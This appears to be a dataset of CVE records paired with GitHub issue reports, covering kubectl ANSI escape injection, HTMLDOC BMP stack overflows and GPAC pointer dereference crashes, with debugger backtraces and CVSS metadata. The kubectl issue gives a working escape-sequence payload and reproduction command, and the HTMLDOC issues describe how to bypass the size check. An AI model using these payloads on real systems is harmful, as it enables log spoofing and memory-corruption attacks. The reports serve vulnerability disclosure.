0x7ffff790fe70 (<ShiftMetaOffset.isra.0>: mov rax,QWORD PTR [rdi]) R8 : 0x0 R9 : 0x7fffffff7f00 --> 0x5555555e4c34 --> 0xe8 R10: 0x7ffff76d927a ("gf_isom_box_size") R11: 0x7ffff78fa0d0 (<gf_isom_box_size>: endbr64) R12: 0x5555555da950 --> 0xffffffec R13: 0x14 R14: 0x7 R15: 0x7fffffff7f80 --> 0x0 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff790fe60 <gf_isom_get_content_light_level_info+128>: ret 0x7ffff790fe61: nop WORD PTR cs:[rax+rax*1+0x0] 0x7ffff790fe6b: nop DWORD PTR [rax+rax*1+0x0] => 0x7ffff790fe70 <ShiftMetaOffset.isra.0>: mov rax,QWORD PTR [rdi] 0x7ffff790fe73 <ShiftMetaOffset.isra.0+3>: test rax,rax 0x7ffff790fe76 <ShiftMetaOffset.isra.0+6>: je 0x7ffff790ff60 <ShiftMetaOffset.isra.0+240> 0x7ffff790fe7c <ShiftMetaOffset.isra.0+12>: push r15 0x7ffff790fe7e <ShiftMetaOffset.isra.0+14>: push r14 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff7f78 --> 0x7ffff7910370 (<inplace_shift_moov_meta_offsets+176>: mov rsi,QWORD PTR [rbx+0x38]) 0008| 0x7fffffff7f80 --> 0x0 0016| 0x7fffffff7f88 --> 0x82af77da4fe8b600 0024| 0x7fffffff7f90 --> 0x0 0032| 0x7fffffff7f98 --> 0x5555555da950 --> 0xffffffec 0040| 0x7fffffff7fa0 --> 0x5555555df7a0 --> 0x5555555f02f0 --> 0xfbad2480 0048| 0x7fffffff7fa8 --> 0x0 0056| 0x7fffffff7fb0 --> 0x7fffffff8488 --> 0x14 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff790fe70 in ShiftMetaOffset.isra.0 () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 gdb-peda$ bt #0 0x00007ffff790fe70 in ShiftMetaOffset.isra.0 () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #1 0x00007ffff7910370 in inplace_shift_moov_meta_offsets () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #2 0x00007ffff7910e3c in inplace_shift_mdat () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff7915009 in WriteToFile () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff7906432 in gf_isom_write () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff79064b8 in gf_isom_close () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #6 0x000055555557bd12 in mp4boxMain () #7 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #8 0x000055555556d45e in _start () ```
Untrusted pointer dereference in ShiftMetaOffset.isra.0 ()
https://api.github.com/repos/gpac/gpac/issues/2006/comments
1
2021-12-22T18:20:11Z
2022-01-03T11:24:37Z
https://github.com/gpac/gpac/issues/2006
1,087,071,987
2,006
2,955
CVE-2021-25743
2022-01-07T00:15:07.817
kubectl does not neutralize escape, meta or control sequences contained in the raw data it outputs to a terminal. This includes but is not limited to the unstructured string fields in objects such as Events.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 1.4, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Vendor Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/101695" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220217-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/101695" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220217-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "ECA582BF-2777-4ABB-A12C-D1D226CC7D08", "versionEndExcluding": null, "versionEndIncluding": "1.18.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "150" ]
150
https://github.com/kubernetes/kubernetes/issues/101695
[ "Vendor Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
It is a security issue, but after contacting security@kubernetes.io, Tim and the team confirmed that they are comfortable posting it publicly. #### What happened: Kubernetes doesn't sanitize the 'message' field in the Event JSON objects. Notice that this is relevant only to JSON objects, not YAML objects. By creating new event, we can insert ANSI escape characters inside the "message" field, like: ``` "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done" ``` This an example of such JSON request: ``` { "apiVersion": "v1", "involvedObject": { "kind": "Node", "name": "node01", "uid": "node01" }, "kind": "Event", "message": "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done", "metadata": { "name": "spoofEvent", "namespace": "default" }, "source": { "component": "kubelet", "host": "node01" }, "type": "Normal" } ``` The codes: `\u001b[2J` -> Clean the screen and history `\u001b[3J` -> Clean the entire screen and delete all lines saved in the scrollback buffer `\u001b[1;1H` -> Moves the cursor position to row 1, column 1 (beginning). `\u001b[m` -> Set the colors `\u001b[60C` -> Move the cursor forward 60 steps `\u001b[1;1m` -> Set the text colors to white The result is that the text was spoofed, and we could spoof the events, create hidden events, or hide other events. #### What you expected to happen: The ANSI escape characters will be filtered so they couldn't affect the terminal (i.e. using embeded ANSI colors won't do anything to the terminal). Or maybe some message that says that you can't use ANSI escape characters. #### How to reproduce it (as minimally and precisely as possible): 1. Run this code: ``` kubectl create -f - <<EOF { "apiVersion": "v1", "involvedObject": { "kind": "Node", "name": "node01", "uid": "node01" }, "kind": "Event", "message": "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done", "metadata": { "name": "spoofEvent", "namespace": "default" }, "source": { "component": "kubelet", "host": "node01" }, "type": "Normal" } EOF ``` It will create a new event. 2. Run `kubectl get events`, you will see that the screen was clear, you will get a "spoof" message, and all the rest events or columns were gone. #### Anything else we need to know?: It might look like a low severity issue, but there are other variety of things we can do, from DoS by using colors to hide all the events, changing the title of the terminal window, and spoof the data. It can affect other systems that are using Kubernetes events, such as monitoring applications. It doesn't have to be only the Kubernetes events. There might be other vulnerable objects that we didn't find or other systems that create new objects that count on this mechanism. ANSI escape characters were used to abuse terminals emulators and even cause code execution if the terminal is vulnerable (like CVE-2003-0069). #### Environment: - Kubernetes version (use `kubectl version`): ``` Client Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.4", GitCommit:"e87da0bd6e03ec3fea7933c4b5263d151aafd07c", GitTreeState:"clean", BuildDate:"2021-02-18T16:12:00Z", GoVersion:"go1.15.8", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.2", GitCommit:"faecb196815e248d3ecfb03c680a4507229c2a56", GitTreeState:"clean", BuildDate:"2021-01-13T13:20:00Z", GoVersion:"go1.15.5", Compiler:"gc", Platform:"linux/amd64"} ``` - Cloud provider or hardware configuration: - OS (e.g: `cat /etc/os-release`): ``` NAME="Ubuntu" VERSION="16.04.7 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.7 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" VERSION_CODENAME=xenial UBUNTU_CODENAME=xenial ``` - Kernel (e.g. `uname -a`): ``` Linux manager1 4.15.0-140-generic #144~16.04.1-Ubuntu SMP Fri Mar 19 21:24:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux ``` - Install tools: minikube ``` minikube version: v1.19.0 commit: 15cede53bdc5fe242228853e737333b09d4336b5 ``` - Network plugin and version (if this is a network-related bug): - Others: we also reproduced it in Kubernetes (not minikube) version 1.18
ANSI escape characters in kubectl output are not being filtered
https://api.github.com/repos/kubernetes/kubernetes/issues/101695/comments
31
2021-05-02T12:06:24Z
2023-10-31T11:37:13Z
https://github.com/kubernetes/kubernetes/issues/101695
873,925,774
101,695
2,956
CVE-2021-43579
2022-01-10T14:10:24.167
A stack-based buffer overflow in image_load_bmp() in HTMLDOC <= 1.9.13 results in remote code execution if the victim converts an HTML document linking to a crafted BMP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/27d08989a5a567155d506ac870ae7d8cc88fa58b" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/compare/v1.9.12...v1.9.13" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/453" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/456" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/27d08989a5a567155d506ac870ae7d8cc88fa58b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/compare/v1.9.12...v1.9.13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/453" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/456" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "88D3AD7A-B075-413C-B449-D52E8EBE160F", "versionEndExcluding": null, "versionEndIncluding": "1.9.13", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/453
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
In `image_load_bmp()`, the `colors_used` variable is read from the BMP file header and directly used to read into a fixed-size buffer. ```c static int /* O - 0 = success, -1 = fail */ image_load_bmp(image_t *img, /* I - Image to load into */ FILE *fp, /* I - File to read from */ int gray, /* I - Grayscale image? */ int load_data)/* I - 1 = load image data, 0 = just info */ { ... uchar colormap[256][4]; ... colors_used = read_dword(fp); ... fread(colormap, colors_used, 4, fp); ... } ``` A maliciously crafted BMP file could set the `colors_used` variable to a number big enough to overflow the stack and thus the return address. I am attaching a proof of concept below. It can be tested with: `./htmldoc --webpage -f out.pdf ./poc.html` [poc.zip](https://github.com/michaelrsweet/htmldoc/files/7475732/poc.zip)
Stack buffer overflow in image_load_bmp()
https://api.github.com/repos/michaelrsweet/htmldoc/issues/453/comments
3
2021-11-04T15:10:19Z
2021-11-15T08:04:53Z
https://github.com/michaelrsweet/htmldoc/issues/453
1,044,869,365
453
2,957
CVE-2021-43579
2022-01-10T14:10:24.167
A stack-based buffer overflow in image_load_bmp() in HTMLDOC <= 1.9.13 results in remote code execution if the victim converts an HTML document linking to a crafted BMP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/27d08989a5a567155d506ac870ae7d8cc88fa58b" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/compare/v1.9.12...v1.9.13" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/453" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/456" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/27d08989a5a567155d506ac870ae7d8cc88fa58b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/compare/v1.9.12...v1.9.13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/453" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/456" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "88D3AD7A-B075-413C-B449-D52E8EBE160F", "versionEndExcluding": null, "versionEndIncluding": "1.9.13", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/456
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
The fix for the issue [stack buffer overflow before 1.9.13](https://github.com/michaelrsweet/htmldoc/issues/453) does not completely protect against a stack buffer overflow in `image_load_bmp()`. It is possible to control the read in buffer `colormap` through the `colors_used` variable. The previous fix does not mitigate the issue as the `color_used` is an `integer`, therefore, regardless of the `unsigned` return of `read_dword(fp)` the buffer can be overflowed. ``` static int /* O - 0 = success, -1 = fail */ image_load_bmp(image_t *img, /* I - Image to load into */ FILE *fp, /* I - File to read from */ int gray, /* I - Grayscale image? */ int load_data)/* I - 1 = load image data, 0 = just info */ { ... uchar colormap[256][4]; ... colors_used = (int)read_dword(fp); ... // Get colormap... if (colors_used == 0 && depth <= 8) colors_used = 1 << depth; else if (colors_used > 256) // colors_used => 0xffffff00 --> -0x100 return (-1); ... fread(colormap, colors_used, 4, fp); ... } ``` As an example, if `colors_used` is `0xffffff00` the if statement validates the variable and leads to a buffer overflow. **Impact** - This buffer overflow can lead to modifying the instruction pointer and can therefore lead to remote code execution. ![image](https://user-images.githubusercontent.com/14258664/145671115-abde9452-18b6-414c-bbb8-734486a7b99a.png) POC: [vuln_htmldoc_1.9.13.zip](https://github.com/michaelrsweet/htmldoc/files/7696723/vuln_htmldoc_1.9.13.zip)
Stack Buffer Overflow with BMP files - Version 1.9.13
https://api.github.com/repos/michaelrsweet/htmldoc/issues/456/comments
2
2021-12-11T09:15:18Z
2021-12-18T12:44:27Z
https://github.com/michaelrsweet/htmldoc/issues/456
1,077,479,183
456
2,958
CVE-2021-46046
2022-01-10T14:11:16.600
A Pointer Derefernce Vulnerbility exists GPAC 1.0.1 the gf_isom_box_size function, which could cause a Denial of Service (context-dependent).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2005" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2005" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2005
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC8 ``` [POC8.zip](https://github.com/gpac/gpac/files/7764356/POC8.zip) **Result** ``` Segmentation fault. ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff78fa0da in gf_isom_box_size () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA [ REGISTERS ] RAX 0x5b47555e0072 RBX 0x5b47555e0072 RCX 0x0 RDX 0x0 RDI 0x5b47555e0072 RSI 0x2 R8 0x0 R9 0x7fffffff7f80 ◂— 0x2 R10 0x7ffff76d4546 ◂— 'gf_list_insert' R11 0x7ffff7773a80 (gf_list_insert) ◂— endbr64 R12 0x5555555db580 —▸ 0x5555555e2740 —▸ 0x5555555db330 ◂— 0x6d766864 /* 'dhvm' */ R13 0x5555555e2600 ◂— 0x6d6f6f76 /* 'voom' */ R14 0x6 R15 0x0 RBP 0x2 RSP 0x7fffffff7f80 ◂— 0x2 RIP 0x7ffff78fa0da (gf_isom_box_size+10) ◂— mov rax, qword ptr [rdi + 0x10] [ DISASM ] ► 0x7ffff78fa0da <gf_isom_box_size+10> mov rax, qword ptr [rdi + 0x10] 0x7ffff78fa0de <gf_isom_box_size+14> mov rbp, rdi 0x7ffff78fa0e1 <gf_isom_box_size+17> mov edx, dword ptr [rax + 0x58] 0x7ffff78fa0e4 <gf_isom_box_size+20> test edx, edx 0x7ffff78fa0e6 <gf_isom_box_size+22> je gf_isom_box_size+40 <gf_isom_box_size+40> ↓ 0x7ffff78fa0f8 <gf_isom_box_size+40> cmp dword ptr [rdi], 0x75756964 0x7ffff78fa0fe <gf_isom_box_size+46> mov qword ptr [rdi + 8], 8 0x7ffff78fa106 <gf_isom_box_size+54> mov edx, 0xc 0x7ffff78fa10b <gf_isom_box_size+59> jne gf_isom_box_size+74 <gf_isom_box_size+74> ↓ 0x7ffff78fa11a <gf_isom_box_size+74> cmp byte ptr [rax + 0x3c], 0 0x7ffff78fa11e <gf_isom_box_size+78> je gf_isom_box_size+84 <gf_isom_box_size+84> [ STACK ] 00:0000│ r9 rsp 0x7fffffff7f80 ◂— 0x2 01:0008│ 0x7fffffff7f88 —▸ 0x7ffff78fa19a (gf_isom_box_array_size+74) ◂— mov r15d, eax 02:0010│ 0x7fffffff7f90 ◂— 0x400000000 03:0018│ 0x7fffffff7f98 —▸ 0x5555555da950 ◂— 0x0 04:0020│ 0x7fffffff7fa0 —▸ 0x5555555df7a0 —▸ 0x5555555e61c0 ◂— 0xfbad2480 05:0028│ 0x7fffffff7fa8 ◂— 0x0 06:0030│ 0x7fffffff7fb0 —▸ 0x7fffffff8480 ◂— 0x5f2 07:0038│ 0x7fffffff7fb8 —▸ 0x7fffffff8490 ◂— 0x0 [ BACKTRACE ] ► f 0 0x7ffff78fa0da gf_isom_box_size+10 f 1 0x7ffff78fa19a gf_isom_box_array_size+74 f 2 0x7ffff7910e8d inplace_shift_mdat+813 f 3 0x7ffff791549c WriteToFile+3884 f 4 0x7ffff7906432 gf_isom_write+370 f 5 0x7ffff79064b8 gf_isom_close+24 f 6 0x55555557bd12 mp4boxMain+7410 f 7 0x7ffff74dc0b3 __libc_start_main+243 pwndbg> bt #0 0x00007ffff78fa0da in gf_isom_box_size () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #1 0x00007ffff78fa19a in gf_isom_box_array_size () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #2 0x00007ffff7910e8d in inplace_shift_mdat () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff791549c in WriteToFile () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff7906432 in gf_isom_write () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff79064b8 in gf_isom_close () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #6 0x000055555557bd12 in mp4boxMain () #7 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #8 0x000055555556d45e in _start () ```
Untrusted pointer dereference in gf_isom_box_size ()
https://api.github.com/repos/gpac/gpac/issues/2005/comments
1
2021-12-22T17:52:53Z
2022-01-03T11:24:25Z
https://github.com/gpac/gpac/issues/2005
1,087,054,279
2,005
2,959
CVE-2021-46047
2022-01-10T14:11:17.010
A Pointer Dereference Vulnerability exists in GPAC 1.0.1 via the gf_hinter_finalize function.
